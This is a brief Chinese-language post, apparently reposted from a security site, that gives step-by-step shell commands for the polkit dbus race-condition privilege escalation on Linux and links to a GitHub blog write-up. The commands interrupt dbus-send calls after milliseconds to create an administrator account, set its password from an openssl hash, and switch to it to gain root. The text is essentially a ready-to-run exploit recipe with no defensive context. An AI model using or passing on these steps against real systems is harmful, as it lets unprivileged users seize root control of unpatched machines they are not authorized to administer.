文章来源：安全鸭

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1#创建用户dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!#查看用户id boris#openssl生成密码hash值openssl passwd -5 iaminvincible!#为用户设置密码。注意string:''处填入上面openssl生成的hash值dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'' string:GoldenEye & sleep 0.008s ; kill $!#切换用户su - boris

https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/